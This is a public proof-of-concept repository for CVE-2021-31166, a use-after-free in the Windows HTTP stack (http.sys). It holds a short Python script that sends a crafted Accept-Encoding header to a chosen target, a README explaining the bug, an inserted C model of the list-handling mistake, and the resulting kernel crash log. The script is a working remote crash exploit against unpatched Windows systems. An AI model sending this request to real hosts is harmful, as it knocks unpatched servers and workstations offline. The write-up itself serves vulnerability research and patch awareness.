├── pics
│   ├── trigger.gif
│   └── rel04vsrel05.png
├── cve-2021-31166.py
├── LICENSE
└── README.md

/pics/trigger.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0vercl0k/CVE-2021-31166/HEAD/pics/trigger.gif
--------------------------------------------------------------------------------

/pics/rel04vsrel05.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0vercl0k/CVE-2021-31166/HEAD/pics/rel04vsrel05.png
--------------------------------------------------------------------------------

/cve-2021-31166.py:
--------------------------------------------------------------------------------
# Axel '0vercl0k' Souchet - May 16 2021
import requests
import argparse

def main():
    # Pass the text as `description=`; the first positional parameter of
    # ArgumentParser is `prog`, which would replace the program name in --help.
    parser = argparse.ArgumentParser(description = 'Poc for CVE-2021-31166: remote UAF in HTTP.sys')
    parser.add_argument('--target', required = True)
    args = parser.parse_args()
    # Single GET whose Accept-Encoding value exercises the http!UlpParseContentCoding
    # path described in the README.
    r = requests.get(f'http://{args.target}/', headers = {
        'Accept-Encoding': 'doar-e, ftw, imo, ,',
    })
    print(r)

if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------

/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2021 Axel Souchet

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# CVE-2021-31166: HTTP Protocol Stack Remote Code Execution Vulnerability

This is a proof of concept for [CVE-2021-31166](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166) ("HTTP Protocol Stack Remote Code Execution Vulnerability"), a use-after-free in `http.sys` patched by Microsoft in May 2021. According to this [tweet](https://twitter.com/metr0/status/1392631376592076805), the vulnerability was found by [@_mxms](https://twitter.com/_mxms) and [@fzzyhd1](https://twitter.com/fzzyhd1).

![trigger](pics/trigger.gif)

The bug itself is in `http!UlpParseContentCoding`: the function builds a list on a local `LIST_ENTRY`, appending items to it, and when it is done it moves the list into the `Request` structure without `NULL`ing out the local list head. An attacker can then trigger a code path that frees every entry of the local list, leaving dangling entries in the `Request` object.
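The list-handling mistake described above, modelled as an added example in C (this is not code from this repository or from `http.sys`; all names are invented and the splice/remove logic is an assumption about the pattern, not a reproduction of the driver). A parser collects entries on a local `LIST_ENTRY`, splices the list into a request object, and leaves the local head still pointing at the entries. When the error path then "frees" the local list, it pops entries that now belong to the request and, on the second pass, fails the safe-linking neighbour check, which is what the kernel reports as bugcheck 0x139 with argument 3. The fixed variant re-initialises the local head after the move, so the error path finds an empty list and the request keeps its entries. Nothing is actually `free()`d: entries are only flagged, so the demonstration has no undefined behaviour.

```c
/* Added example: toy model of "local list head moved into a struct but not
 * re-initialised". Invented names; not http.sys code. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry;

#define CONTAINING_RECORD(ptr, type, member) \
    ((type *)((char *)(ptr) - offsetof(type, member)))

enum { STATUS_OK = 0, STATUS_CORRUPT_LIST_ENTRY = 0x139 };

typedef struct coding {
    list_entry link;
    char name[16];
    int freed;                 /* set instead of releasing memory */
} coding;

typedef struct request {
    list_entry unknown_codings;
} request;

static void initialize_list_head(list_entry *h) { h->flink = h->blink = h; }
static int  is_list_empty(const list_entry *h)  { return h->flink == h; }

static void insert_tail_list(list_entry *h, list_entry *e) {
    e->flink = h;
    e->blink = h->blink;
    h->blink->flink = e;
    h->blink = e;
}

/* Safe-linked removal: a second removal of the same entry fails the check. */
static int remove_entry_list(list_entry *e) {
    if (e->flink->blink != e || e->blink->flink != e)
        return STATUS_CORRUPT_LIST_ENTRY;
    e->blink->flink = e->flink;
    e->flink->blink = e->blink;
    return STATUS_OK;
}

/* Splice every entry of src onto the empty dst head. The src head is left
 * untouched on purpose: that is the missing half of the move. */
static void move_list(list_entry *dst, list_entry *src) {
    if (is_list_empty(src)) { initialize_list_head(dst); return; }
    dst->flink = src->flink;
    dst->blink = src->blink;
    dst->flink->blink = dst;
    dst->blink->flink = dst;
}

/* Error-path cleanup: pop and "free" until the head says it is empty. */
static int free_coding_list(list_entry *head) {
    while (!is_list_empty(head)) {
        list_entry *e = head->flink;
        int rc = remove_entry_list(e);
        if (rc != STATUS_OK)
            return rc;                       /* the kernel would bugcheck here */
        CONTAINING_RECORD(e, coding, link)->freed = 1;
    }
    return STATUS_OK;
}

/* Model of the parser; reinit_after_move selects the fixed behaviour. */
static int parse_codings(request *req, coding *pool, const char *const *names,
                         size_t n, int malformed, int reinit_after_move) {
    list_entry local;
    initialize_list_head(&local);
    initialize_list_head(&req->unknown_codings);
    for (size_t i = 0; i < n; i++) {
        memset(&pool[i], 0, sizeof pool[i]);
        strncpy(pool[i].name, names[i], sizeof pool[i].name - 1);
        insert_tail_list(&local, &pool[i].link);
    }
    move_list(&req->unknown_codings, &local);   /* hand the list to the request */
    if (reinit_after_move)
        initialize_list_head(&local);           /* the fix: local head forgets the entries */
    if (malformed)
        return free_coding_list(&local);        /* error path: clean up "my" list */
    return STATUS_OK;
}

static int count_request_codings(const request *req) {
    int n = 0;
    for (const list_entry *e = req->unknown_codings.flink;
         e != &req->unknown_codings; e = e->flink)
        n++;
    return n;
}

/* Run one variant on a malformed header carrying three unknown codings
 * (constructed names); returns the parser status and the entries still linked. */
int run_variant(int reinit_after_move, int *codings_left) {
    static const char *const names[] = { "doar-e", "ftw", "imo" };
    coding pool[3];
    request req;
    int rc = parse_codings(&req, pool, names, 3, /*malformed=*/1, reinit_after_move);
    *codings_left = count_request_codings(&req);
    return rc;
}

int main(void) {
    int left, rc;
    rc = run_variant(0, &left);
    printf("vulnerable: status 0x%x, %d codings left on request\n", rc, left);
    rc = run_variant(1, &left);
    printf("fixed:      status 0x%x, %d codings left on request\n", rc, left);
    return 0;
}
```

In the vulnerable variant the first pop succeeds (the entry is still properly linked, just no longer owned by the local head), gets flagged as freed, and the stale local head immediately points the loop back at it; the second `remove_entry_list` sees neighbours that no longer reference the entry and returns the 0x139 analogue. That is the double-remove signature in the bugcheck arguments, and it shows why the crash surfaces inside the list-freeing routine rather than at a later dereference.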

![rel04vsrel05](pics/rel04vsrel05.png)

Here is the bugcheck:

```
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x00000139
                       (0x0000000000000003,0xFFFFF90EA867EE40,0xFFFFF90EA867ED98,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff804`19410c50 cc              int     3

kd> kp
 # Child-SP          RetAddr               Call Site
00 fffff90e`a867e368 fffff804`19525382     nt!DbgBreakPointWithStatus
01 fffff90e`a867e370 fffff804`19524966     nt!KiBugCheckDebugBreak+0x12
02 fffff90e`a867e3d0 fffff804`19408eb7     nt!KeBugCheck2+0x946
03 fffff90e`a867eae0 fffff804`1941ad69     nt!KeBugCheckEx+0x107
04 fffff90e`a867eb20 fffff804`1941b190     nt!KiBugCheckDispatch+0x69
05 fffff90e`a867ec60 fffff804`19419523     nt!KiFastFailDispatch+0xd0
06 fffff90e`a867ee40 fffff804`1db3f677     nt!KiRaiseSecurityCheckFailure+0x323
07 fffff90e`a867efd0 fffff804`1daf6c05     HTTP!UlFreeUnknownCodingList+0x63
08 fffff90e`a867f000 fffff804`1dacd201     HTTP!UlpParseAcceptEncoding+0x299c5
09 fffff90e`a867f0f0 fffff804`1daa93d8     HTTP!UlAcceptEncodingHeaderHandler+0x51
0a fffff90e`a867f140 fffff804`1daa8ab7     HTTP!UlParseHeader+0x218
0b fffff90e`a867f240 fffff804`1da04c5f     HTTP!UlParseHttp+0xac7
0c fffff90e`a867f3a0 fffff804`1da0490a     HTTP!UlpParseNextRequest+0x1ff
0d fffff90e`a867f4a0 fffff804`1daa48c2     HTTP!UlpHandleRequest+0x1aa
0e fffff90e`a867f540 fffff804`1932ae85     HTTP!UlpThreadPoolWorker+0x112
0f fffff90e`a867f5d0 fffff804`19410408     nt!PspSystemThreadStartup+0x55
10 fffff90e`a867f620 00000000`00000000     nt!KiStartSystemThread+0x28

kd> !analyze -v
[...]
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove).
Arg2: fffff90ea867ee40, Address of the trap frame for the exception that caused the BugCheck
Arg3: fffff90ea867ed98, Address of the exception record for the exception that caused the BugCheck
Arg4: 0000000000000000, Reserved
```

## Frequently Asked Questions

**Q: Is [Windows Remote Management (WinRM)](https://docs.microsoft.com/en-us/windows/win32/winrm/portal) affected?**

Yes (thanks to [@JimDinMN](https://twitter.com/JimDinMN) for sharing [his experiments](https://twitter.com/JimDinMN/status/1395071966487269376)).

**Q: Is [Web Services on Devices (WSDAPI)](https://docs.microsoft.com/en-us/windows/win32/wsdapi/wsd-portal) affected?**

Yes (thanks to [@HenkPoley](https://twitter.com/HenkPoley) for sharing his [results](https://twitter.com/HenkPoley/status/1394309837304082439)).

**Q: What are the affected versions of Windows?**

According to [Microsoft's documentation](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166), here are the affected platforms:

- Windows Server, version 2004 (or 20H1) (Server Core installation)
- Windows 10 Version 2004 (or 20H1) for ARM64/x64/32-bit Systems
- Windows Server, version 20H2 (Server Core Installation)
- Windows 10 Version 20H2 for ARM64/x64/32-bit Systems
--------------------------------------------------------------------------------